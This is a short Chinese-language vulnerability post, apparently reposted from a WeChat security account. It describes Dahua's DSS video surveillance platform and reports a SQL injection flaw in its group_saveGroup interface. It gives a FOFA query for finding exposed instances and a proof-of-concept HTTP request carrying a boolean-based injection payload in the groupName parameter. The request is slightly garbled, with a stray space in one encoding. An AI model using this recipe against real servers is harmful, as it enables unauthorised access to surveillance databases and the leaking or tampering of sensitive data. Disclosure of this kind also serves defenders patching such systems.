产品简介
DSS是大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。可将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合在一起,实现更加智能、便捷的分级查询服务。
漏洞概述
大华DSS某接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
FOFA
app="dahua-DSS"
POC
GET /emap/group_saveGroup?groupName=1%27+AND+2103%3D2103+AND+%27xvPq%2 7%3D%27xvPq HTTP/1.1 Host: Accept-Encoding: identity Accept-Language: zh-CN,zh;q=0.8 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 Connection: keep-alive Cache-Control: max-age=
原文始发于微信公众号(7coinSec):大华DSS 视频管理系统存在group_saveGroup注入
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论